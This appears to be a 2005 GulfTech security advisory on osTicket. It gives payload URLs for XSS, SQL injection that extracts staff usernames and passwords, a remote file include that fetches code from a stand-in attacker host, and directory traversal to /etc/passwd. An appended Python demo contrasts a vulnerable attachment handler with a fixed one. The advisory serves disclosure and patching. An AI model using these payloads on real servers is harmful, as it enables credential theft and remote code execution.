osTicketSQL.txt
Posted Jul 8, 2005
Authored by James Bercegay | Site gulftech.org

osTicket is susceptible to SQL injection vulnerabilities. All versions are affected.

tags | exploit, vulnerability, sql injection
SHA-256 | 342e3812e317e1b0abd7304b7bd758488e158450bc02ecdbc5034c31a27f2569

##########################################################
# GulfTech Security Research May 2nd, 2005
##########################################################
# Vendor : osTicket
# URL : http://www.osticket.com/
# Version : All Versions
# Risk : Multiple Vulnerabilities
##########################################################


Description:
osTicket is a widely-used open source support ticket system. It is a
lightweight support ticket tool written mainly in PHP. There are several
vulnerabilities in the osTicket software that may allow an attacker to
take control of the affected web server, disclose sensitive data from the
database, or read arbitrary files. These issues have been reported to the
developers and a new updated version of osTicket is available for
download. All affected users should upgrade their osTicket installations
immediately.


Cross Site Scripting:
Cross site scripting exists in osTicket. It is caused by user-supplied
input being echoed into the page without being checked or encoded, as in
the following requests (replace [XSS] with script markup of your choice).

http://example.com/view.php?e=test@test.com&t=480826[XSS]
http://example.com/include/header.php?osticket_title=%3C/title%3E[XSS]
http://example.com/include/admin_login.php?em=asdf[XSS]
http://example.com/include/user_login.php?e=asdf[XSS]
http://example.com/include/open_submit.php?err=[XSS]

This vulnerability could be used to steal cookie-based authentication
credentials within the scope of the current domain, or to render hostile
code in a victim's browser.



Script/HTML Injection:
When opening a ticket an attacker may place script or HTML in the name
and subject fields. It is stored and rendered unencoded in the browser of
anyone who later views the ticket (such as an admin), and can be combined
with CSRF to make those users or admins perform arbitrary actions with
their own privileges.



SQL Injection:
osTicket is prone to two SQL Injection issues, one lies in the search
engine, and one lies in viewing tickets. Below are a few examples.

http://example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username,password,0,0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*

http://example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username,password,'your@email.org',0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*

http://example.com/view.php?s=advanced&query=&cat=-99%20UNION%20SELECT%2031337,0,0,0,password%20FROM%20ticket_reps%20WHERE%20ID=5/*&status=&sort=ID&way=ASC&per=5&search_submit=Search

The first example is not that easy to exploit, and the example I have
given only works if you are logged in as admin. Why is this? Let's have
a look at includes/viewticket.php

//user is allowed to view ticket
$show = $_SESSION[user][type] == "admin" ? 1 : !$cat_row[hidden];

// admin: allowed if the ticket's category is in the rep's category list,
// the rep has access to "all" categories, or the rep is the ADMIN account
$admin_permis = ($_SESSION[user][type] == "admin" and
                 (@in_array($cat_row[ID], $oslogin[cat_access]) or
                  $oslogin[cat_access][0] == "all" or
                  $oslogin[ID] == ADMIN));

// client: allowed only if the email stored with the ticket row matches
// the logged-in client's email
$client_permis = ($_SESSION[user][type] == "client" and
                  $ticket_row[email] == $_SESSION[user][id]);

if (!$client_permis and !$admin_permis) {
    echo "Access denied.";
}

As the code shows, the client check compares $ticket_row[email], which
comes straight from the query result, with the logged-in client's email.
In a UNION SELECT the attacker chooses what lands in that column (the
'your@email.org' literal in the second example above), so the check can
be satisfied directly from the query string when magic_quotes_gpc is off.
A lot of the time it is on, in which case the quotes around the literal
are escaped and the query breaks. If an attacker cannot influence the
returned email address during a UNION SELECT he can instead do something
like a SELECT INTO OUTFILE, or try to enumerate data using built-in MySQL
functions. The issue is exploitable, just not as easy as some SQL
injection issues, because a row that does not satisfy the ownership check
is never displayed. The search engine issue, on the other hand, is pretty
run of the mill and not hard for an attacker to exploit. An attacker needs
to be logged in with at least a user account to exploit either issue.


Remote File Include Vulnerability:
osTicket is prone to both remote and local file include vulnerabilities,
which may allow an attacker to execute arbitrary commands on the victim
web server by including files of his choosing. The vulnerable code is in
the file titled "include/main.php":

if ($config[search_disp]) {
    include("$include_dir/search.php");
}

If register_globals is on, both $config[search_disp] and $include_dir can
be set from the query string, and if no include restrictions are in
effect (remote URLs allowed in include, i.e. allow_url_fopen enabled)
$include_dir can point at a host we control, so any PHP code of our choice
is fetched and executed. Of course the server hosting the malicious file
must not have PHP enabled for that file, or it would be executed there and
only its output, not its source, would reach the victim server.

http://example.com/include/main.php?config[search_disp]=true&include_dir=http://attacker

This issue is very dangerous where present, but regardless of your server
configuration you are still encouraged to upgrade immediately.



Directory Traversal Vulnerability:
There is a directory traversal issue in the attachments.php script used by
osTicket. The good news is that it is only reachable when the
administrator has enabled file uploads (off by default, it has to be
turned on manually), but it should be noted that even with attachments
disabled the error messages this script outputs still cause a cross site
scripting issue, since the requested file name is echoed back. Below is
an example.

http://example.com/attachments.php?file=../../../../../../../etc/passwd

This vulnerability can be used to retrieve arbitrary files that the web
server user can read, and may aid in further attacking a vulnerable
system.
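The handler below is an added example, not osTicket's attachments.php, written in Python to show the defect and its fix side by side: the vulnerable version joins the requested name onto the attachment directory and opens whatever results, while the fixed version canonicalises the path first and refuses anything that does not stay under the attachment directory. The directory tree, file names and contents are constructed for the demo, and the symlink case (a link inside the attachment directory pointing outside it) goes beyond what the advisory describes.

```python
import os
import shutil
import tempfile


def read_attachment_vulnerable(attach_dir, requested):
    """Concatenate and open, as a naive attachments.php?file= handler would.
    '../' sequences and absolute paths walk straight out of attach_dir."""
    with open(os.path.join(attach_dir, requested), "rb") as f:
        return f.read()


def read_attachment_fixed(attach_dir, requested):
    """Canonicalise first (realpath resolves '..' and symlinks), then require
    that the result still lies under attach_dir. Returns None on any escape or
    missing file; the caller should print a fixed message instead of echoing
    the file name, which is what turned the error path into an XSS."""
    base = os.path.realpath(attach_dir)
    target = os.path.realpath(os.path.join(base, requested))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:            # different drives on Windows
        inside = False
    if not inside or not os.path.isfile(target):
        return None
    with open(target, "rb") as f:
        return f.read()


def run_demo():
    """Build a throwaway tree (constructed data): one real attachment, one
    secret file outside the attachment directory, and a symlink inside the
    directory that points at the secret. Run both handlers against
    advisory-style payloads and return the outcomes."""
    root = tempfile.mkdtemp()
    attach = os.path.join(root, "attachments")
    os.mkdir(attach)
    with open(os.path.join(attach, "invoice.txt"), "wb") as f:
        f.write(b"legit attachment")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "wb") as f:
        f.write(b"db password")
    link = os.path.join(attach, "link.txt")
    try:
        os.symlink(secret, link)
    except (OSError, NotImplementedError):   # e.g. unprivileged Windows
        link = None
    try:
        return {
            "legit_vuln": read_attachment_vulnerable(attach, "invoice.txt"),
            "traversal_vuln": read_attachment_vulnerable(attach, "../secret.txt"),
            "legit_fixed": read_attachment_fixed(attach, "invoice.txt"),
            "traversal_fixed": read_attachment_fixed(attach, "../secret.txt"),
            "deep_traversal_fixed": read_attachment_fixed(
                attach, "../../../../../../../etc/passwd"),
            "absolute_fixed": read_attachment_fixed(attach, secret),
            "symlink_fixed": (read_attachment_fixed(attach, "link.txt")
                              if link else None),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:22} {result!r}")
```

Checking the canonical path rather than filtering `..` out of the input is what makes the fix hold up: it also rejects absolute paths, over-long `../` chains that clamp at the filesystem root, and symlinks dropped into the attachment directory.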



Solution:
The developer was contacted in early April, and a patch has been developed
and should be available now.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00071-05022005



Credits:
James Bercegay of the GulfTech Security Research Team